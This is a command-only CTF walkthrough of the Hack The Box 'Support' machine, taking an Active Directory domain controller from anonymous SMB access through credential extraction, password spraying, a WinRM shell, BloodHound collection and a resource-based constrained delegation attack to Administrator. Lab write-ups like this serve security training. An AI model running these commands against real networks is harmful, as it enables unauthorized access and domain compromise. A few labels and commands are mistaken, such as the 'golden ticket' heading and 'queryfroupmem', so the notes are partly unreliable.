Support
Hola, esta es la máquina support! Let’s hack!
RECON
ping -c 1 <IP>
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn <IP> -oG ports
extractports <ports>
nmap -sCV <PORTS> -oG services
AD DOMAIN DETECTION
crackmapexec smb <IP>
sudo su
nvim /etc/hosts
<IP> dc dc.<DOMAIN> <DOMAIN>
SMB ENUM
smbclient -L <IP> -N
crackmapexec smb <IP> --shares
smbmap -H <IP>
smbmap -H <IP> -u 'null'
smbmap -H <IP> -u none
SMB NULL SESSION
smbclient //<IP>/support-tools -N
ls
get UserInfo.exe.zip
USERINFO.EXE.ZIP ENUM
7z l UserInfo.exe.zip
unzip UserInfo.exe.zip
strings -e l UserInfo.exe
USERS DICTIONARY
nvim users.txt
ldap
KERBRUTE INSTALL
git clone http://github.com/ropnop/kerbrute
cd kerbrute
go build .
go build -ldflags '-s -w' .
upx kerbrute
mv kerbrute /opt/kerbrute
nvim ~/.zshrc
#AL FINAL DE LA LINEA DE <PATH>
:/opt/kerbrute
TGT KERBRUTE ENUM
kerbrute userenum -d support.htb --dc <IP> users.txt
kerbrute userenum -d support.htb --dc <IP> /usr/share/SecLists/Usernames/xato-net-10-million-usernames.txt
TGT GETNPUSERS ENUM (ASREPROAST ATTACK)
impacket-GetNPUsers htb.local/ -no-pass -usersfile users.txt
impacket-GetNPUsers htb.local/ -no-pass -usersfile /usr/share/SecLists/Usernames/xato-net-10-million-usernames.txt
UPDATING USERS DICTIONARY
nvim users.txt
ldap@support.htb
guest@support.htb
support-tools@support.htb
administrator@support.htb
WINDOWS MACHINE USERINFO.EXE ENUM
# SIGUE LOS PASOS
> Agregar al /etc/host la <IP> y el <DOMAIN>
> Instalar OpenVPN y cargar archivo de HTB_VPN
> Abrir cmd.exe en la ruta de UserInfo.exe
.\UserInfo.exe find -first * -last *
.\UserInfo.exe user -username *
WINDOWS MACHINE DNSPY ENUM
# DESCARGAR Y DESCOMPRIMIR DNSPY
https://github.com/dnSpy/dnSpy/releases/download/v6.1.8/dnSpy-netframework.zip
#EJECUTAR DNSPY Y CARGAR USERINFO.EXE
> UserInfo.exe > UserInfo > UserInfo.Services > LdapQuery
# ASIGNAR UN BREAK POINT EN LA LINEA 12 (PASSWORD)
Tecla f9
# DEPURAR EL PROGRAMA
Tecla f5
> Argumentos: find -first * -last * > Aceptar
# DAR UN PASO MÁS EN EL DEBUG
Tecla f10
# SE DETECTA LA VARIABLE PASSWORD Y SU RESPECTIVO VALOR
# APAGAR OPENVPN
VALIDATING LDAP CREDENTIALS
# ACTIVAR OPENVPN
echo 'ldap:<PASSWORD>' > credentials.txt
crackmapexec smb <IP> -u 'ldap' -p '<PASSWORD>'
crackmapexec winrm <IP> -u 'ldap' -p '<PASSWORD>'
RCPCLIENT ENUM (WITH CREDS)
rpcclient -U 'ldap%<PASSWORD>' <IP> -c enumdomusers | grep -oP '\[.*?\]' | grep -v 0x | tr -d '[]' > users.txt
rpcclient -U 'ldap%<PASSWORD>' <IP> -c enumdomgroups
rpcclient -U 'ldap%<PASSWORD>' <IP> -c queryfroupmem 0x200
rpcclient -U 'ldap%<PASSWORD>' <IP> -c queryuser 0x1f4
rpcclient -U 'ldap%<PASSWORD>' <IP> -c querydispinfo
PASSWORD SPRYING ATTACK
crackmapexec smb <IP> -u users.txt -p <PASSWORD> --continue-on-success
LDAPSEARCH AD ENUM
ldapsearch -x -H ldap://<IP> -D 'ldap@support.htb' -w '<PASSWORD>' -b "DC=support,DC=htb"
ldapsearch -x -H ldap://<IP> -D 'ldap@support.htb' -w '<PASSWORD>' -b "DC=support,DC=htb" | grep -i samaccountname
ldapsearch -x -H ldap://<IP> -D 'ldap@support.htb' -w '<PASSWORD>' -b "DC=support,DC=htb" | grep -i 'samaccountname: support' -B 40
# NUEVO <PASSWORD> EN EL CAMPO "INFO"
PASSWORD SPRYING ATTACK (NEW PASS)
crackmapexec smb <IP> -u users.txt -p <PASSWORD> --continue-on-success
crackmapexec winrm <IP> -u users.txt -p <PASSWORD> --continue-on-success
GRANTED ACCESS SUPPORT USER
crackmapexec winrm <IP> -u 'support' -p '<PASSWORD>'
evil-winrm -i <IP> -u 'support' -p '<PASSWORD>'
whoami
FLAG USER.TXT
type C:\Users\support\Desktop\user.txt
AD LOCAL ENUM
whoami /priv
whoami /all
net group
net user
BLOODHOUND INSTALL
apt install neo4j bloodhound
update-alternatives --config java
# SELECCIONAR JAVA-11
BLOODHOUND ENUM
# MÁQUINA ATACANTE
wget https://github.com/BloodHoundAD/SharpHound/releases/download/v1.1.0/SharpHound-v1.1.0.zip
mkdir SharpHound
cd SharpHound
mv ~/Descargas/SharpHound-v1.1.0.zip .
unzip SharpHound-v1.1.0.zip
# MÁQUINA VÍCTIMA
cd C:\Windows\Temp
mkdir privs
cd privs
upload /opt/BloodHound-linux-x64/SharpHound.exe
.\SharpHound.exe -c All
download C:\Windows\Temp\privs\20220718205025_BloodHound.zip bloodhound.zip
# BLOODHOUND
neo4j console &>/dev/null & disown
bloodhound &>/dev/null & disown
# INGRESAR CREDENCIALES DE ACCESO
# SEGUIR SECUENCIA EN BLOODHOUND
> Upload Data > bloodhound.zip > Analysis > Find all domain admins
> Find Principals with DCSync Rights > Domain
# ENUMERAR GRUPOS
Buscar Shared support accounts> node info > Reachable High Value Targets
# MARCAR USUARIOS PWNED
Buscar user > mark user as owned
# ESCALAMIENTO
Node info > Reachable High Value Targets
RESORCE BASED CONSTRAINED DELEGATION (RBCD) ATTACK
# MÁQUINA ATACANTE
wget https://raw.githubusercontent.com/Kevin-Robertson/Powermad/master/Powermad.ps1
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1
# MÁQUINA VÍCTIMA
upload /opt/BloodHound-linux-x64/Powermad.ps1
Import-Module .\Powermad.ps1
New-MachineAccount -MachineAccount SERVICEA -Password $(ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force) -Verbose
upload /opt/BloodHound-linux-x64/PowerView.ps1
Import-Module .\PowerView.ps1
Get-DomainComputer SERVICEA
$ComputerSid = Get-DomainComputer SERVICEA -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSRDCWDWO;;;$ComputerSid)"
$SDBytes = New-Object byte [] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer dc | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
Get-DomainComputer dc -Properties 'msds-allowedtoactonbehalfofotheridentity'
GRANTED ACCESS ADMINISTRATOR USER (GOLDEN TICKET)
impacket-getST -spn cifs/dc.support.htb -impersonate Administrator -dc-ip <IP> support.htb/SERVICEA$:<PASSWORD>
export KRB5CCNAME=Administrator.ccache
impacket-psexec -k dc.support.htb
whoami
FLAG ROOT.TXT
type C:\Users\Administrator\Desktop\root.txt